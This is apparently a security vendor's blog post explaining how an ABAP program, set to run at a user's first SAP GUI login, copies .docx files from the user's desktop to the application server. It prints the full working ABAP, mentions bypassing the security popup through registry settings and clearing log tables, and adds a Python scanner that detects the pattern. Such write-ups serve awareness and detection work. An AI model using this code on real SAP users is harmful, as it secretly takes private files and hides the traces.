SAP GUI

Getting Files from Local PC via SAP GUI with Illegal Methods

Learn how to retrieve local files from a user's desktop using SAP GUI in SAP systems and understand the potential security risks involved.
Defencemore Team

Introduction

In this blog post, we demonstrate how local files can be retrieved from a user's desktop via SAP GUI in SAP systems. The method involves creating an ABAP program that runs on the user's first login and copies selected files to the application server. This technique highlights a potential security weakness that SAP system administrators and security experts should be aware of.

Step-by-Step Guide

Creating the ABAP Program

First, we create an ABAP program on the SAP system the user will connect to. Below is the program code:

REPORT ZFILE_DOWNLOAD_TO_SERVER_3.

DATA: lv_filename TYPE string,
      file_content TYPE string,
      lv_file_line TYPE string,
      lt_file_data TYPE TABLE OF string.

DATA: filename LIKE rlgrap-filename,
      directory LIKE bdschko16-target_dir,
      itab_dir LIKE sdokpath OCCURS 0 WITH HEADER LINE,
      itab_file LIKE sdokpath OCCURS 0 WITH HEADER LINE,
      dstpath LIKE draw-filep.

directory = 'C:\Users\burha\OneDrive\Desktop\'.
" %UserProfile%\Desktop can be used instead of a static path

dstpath = '/usr/sap/trans/tmp/new_dir/'.
" This directory was chosen for easier access to the files copied from the local PC

CALL FUNCTION 'TMP_GUI_DIRECTORY_LIST_FILES'
  EXPORTING
    directory = directory
    FILTER = '*.docx'
  TABLES
    file_table = itab_file
    dir_table = itab_dir.

IF sy-subrc <> 0.
  " Error handling: stop if the directory listing failed
  MESSAGE 'Directory listing failed' TYPE 'E'.
ENDIF.

LOOP AT itab_file.
  CALL FUNCTION 'GUI_UPLOAD'
    EXPORTING
      filename = directory && itab_file-pathname
      filetype = 'ASC'
    TABLES
      data_tab = lt_file_data
    EXCEPTIONS
      file_open_error = 1
      file_read_error = 2
      no_batch = 3
      gui_refuse_filetransfer = 4
      invalid_type = 5
      no_authority = 6
      unknown_error = 7
      bad_data_format = 8
      header_not_allowed = 9
      separator_not_allowed = 10
      header_too_long = 11
      unknown_dp_error = 12
      access_denied = 13
      dp_out_of_memory = 14
      disk_full = 15
      dp_timeout = 16
      not_supported_by_gui = 17
      error_no_gui = 18
      OTHERS = 19.

  IF sy-subrc <> 0.
    MESSAGE ID sy-msgid TYPE sy-msgty NUMBER sy-msgno
      WITH sy-msgv1 sy-msgv2 sy-msgv3 sy-msgv4.
    EXIT.
  ENDIF.

  DATA: lv_server_dest TYPE string.
  lv_server_dest = dstpath && itab_file-pathname.

  OPEN DATASET lv_server_dest FOR OUTPUT IN TEXT MODE ENCODING DEFAULT.
  IF sy-subrc <> 0.
    " RAISE is only valid in function modules and methods; a report must use MESSAGE
    MESSAGE 'Could not open target file on the server' TYPE 'E'.
  ENDIF.

  LOOP AT lt_file_data INTO lv_file_line.
    TRANSFER lv_file_line TO lv_server_dest.
  ENDLOOP.

  " Close the file that was actually opened (lv_server_dest, not lv_filename)
  CLOSE DATASET lv_server_dest.
ENDLOOP.

" Clear history after execution
" Log tables: USR04 and USH04
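The program above combines a frontend file read (TMP_GUI_DIRECTORY_LIST_FILES and GUI_UPLOAD) with a server-side OPEN DATASET ... FOR OUTPUT. That combination is rare in legitimate custom code and is a useful thing to look for in a code review or an automated scan of exported ABAP sources. The following static check is an added example, not code from the original post or from Defencemore: the function module and CL_GUI_FRONTEND_SERVICES method names it matches are real SAP names, while the rule names, the risk levels and the two sample sources (a trimmed copy of the program above with a placeholder desktop path, and a benign report that only exports its own list with GUI_DOWNLOAD) are constructed for this example.

```python
import re
from dataclasses import dataclass

# Real SAP frontend file-transfer APIs: function modules and CL_GUI_FRONTEND_SERVICES methods.
FRONTEND_READ = {"GUI_UPLOAD", "TMP_GUI_DIRECTORY_LIST_FILES", "DIRECTORY_LIST_FILES"}
FRONTEND_WRITE = {"GUI_DOWNLOAD"}

CALL_FUNCTION_RE = re.compile(r"CALL\s+FUNCTION\s+'([A-Z0-9_/]+)'", re.IGNORECASE)
FRONTEND_METHOD_RE = re.compile(r"CL_GUI_FRONTEND_SERVICES=>([A-Z0-9_]+)", re.IGNORECASE)
SERVER_WRITE_RE = re.compile(r"\bOPEN\s+DATASET\b.*\bFOR\s+(?:OUTPUT|APPENDING)\b", re.IGNORECASE)
CLIENT_PATH_RE = re.compile(r"'[A-Za-z]:\\[^']*'")   # a Windows drive path inside an ABAP literal


@dataclass
class Finding:
    line: int
    rule: str
    detail: str


def strip_comment(line: str) -> str:
    """Drop ABAP comments: '*' in column 1 is a full-line comment, '"' starts an inline one."""
    if line.startswith("*"):
        return ""
    out, in_literal = [], False
    for ch in line:
        if ch == "'":
            in_literal = not in_literal
        elif ch == '"' and not in_literal:
            break
        out.append(ch)
    return "".join(out)


def scan_abap_source(source: str) -> dict:
    """Return {'risk': ..., 'findings': [Finding, ...]} for one ABAP source text.

    HIGH   = frontend files are read AND a server file is written (the pattern in this post)
    MEDIUM = frontend files are read only
    LOW    = other frontend/server file I/O was found
    NONE   = no file transfer found
    """
    findings = []
    reads_frontend = writes_server = False
    for lineno, raw in enumerate(source.splitlines(), start=1):
        code = strip_comment(raw)
        if not code.strip():
            continue
        names = [m.group(1).upper() for m in CALL_FUNCTION_RE.finditer(code)]
        names += [m.group(1).upper() for m in FRONTEND_METHOD_RE.finditer(code)]
        for name in names:
            if name in FRONTEND_READ:
                reads_frontend = True
                findings.append(Finding(lineno, "frontend-read", name))
            elif name in FRONTEND_WRITE:
                findings.append(Finding(lineno, "frontend-write", name))
        if SERVER_WRITE_RE.search(code):
            writes_server = True
            findings.append(Finding(lineno, "server-write", code.strip()))
        path = CLIENT_PATH_RE.search(code)
        if path:
            findings.append(Finding(lineno, "hardcoded-client-path", path.group(0)))
    if reads_frontend and writes_server:
        risk = "HIGH"
    elif reads_frontend:
        risk = "MEDIUM"
    elif findings:
        risk = "LOW"
    else:
        risk = "NONE"
    return {"risk": risk, "findings": findings}


# Constructed sample 1: trimmed copy of the program in this post, with a placeholder desktop path.
SUSPICIOUS_SOURCE = r"""REPORT zfile_download_to_server_3.
DATA: directory LIKE bdschko16-target_dir,
      itab_file LIKE sdokpath OCCURS 0 WITH HEADER LINE,
      lv_server_dest TYPE string.
directory = 'C:\Users\example\Desktop\'.   " placeholder path
CALL FUNCTION 'TMP_GUI_DIRECTORY_LIST_FILES'
  EXPORTING directory = directory FILTER = '*.docx'
  TABLES file_table = itab_file.
LOOP AT itab_file.
  CALL FUNCTION 'GUI_UPLOAD'
    EXPORTING filename = directory && itab_file-pathname
    TABLES data_tab = lt_file_data.
  OPEN DATASET lv_server_dest FOR OUTPUT IN TEXT MODE ENCODING DEFAULT.
  CLOSE DATASET lv_server_dest.
ENDLOOP.
"""

# Constructed sample 2: a report that only exports its own result list to the user's PC.
BENIGN_SOURCE = """REPORT zexport_list.
DATA lt_lines TYPE TABLE OF string.
CALL FUNCTION 'GUI_DOWNLOAD'
  EXPORTING filename = lv_path filetype = 'ASC'
  TABLES data_tab = lt_lines.
"""

if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SOURCE), ("benign", BENIGN_SOURCE)):
        report = scan_abap_source(src)
        print(f"{label}: risk={report['risk']}")
        for f in report["findings"]:
            print(f"  line {f.line}: {f.rule} -> {f.detail}")
```

The check works line by line, so a CALL FUNCTION whose name literal sits on the following line is missed; for a production scan, join statements up to the terminating period first. Sources can be exported with abapGit or read from REPOSRC, and HIGH findings in customer namespace (Z*/Y*) objects are the ones to review first.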

Linking the Program to a Transaction Code

Now we link the program we created to a transaction code (tcode). For this, we create a new transaction code with tcode SE93.

Transaction Code Creation

Adding a Row to AGRDATEU Table

Now that we have our tcode, we add a new row to the AGRDATEU table so that this program runs the first time the user logs into the system.

AGRDATEU Table

Filtering Files for Download

The files are selected according to the filter given in the ABAP program code and written to the /usr/sap/trans/tmp/new_dir folder on the server.

File Filter

Security Popup on Login

When the user logs in to the system, the SAP GUI security popup for the file access is shown. A careless user can simply confirm it without reading. In addition, if desired, the behaviour can be changed in the SAP GUI security settings or in the registry of the client computer.

Security Popup

Viewing the Downloaded File

The copied local file can then be seen in the application server directory.

Local File on Server

SAP GUI Security Settings

SAP GUI did not perform this security check before version 7.20. From version 7.20 on, the permission handling for file upload and download operations has been improved.

SAP GUI Security Settings

Conclusion

Although this vulnerability is unlikely to be exploited, it is important for SAP system administrators to be aware of such methods and take preventive measures. DefenceMore's One Click Audit for SAP can help protect your systems from such attacks.

Contact us to learn more and schedule a free demo of our product that detects security vulnerabilities in SAP systems. Ensure your systems are not only functional but also secure.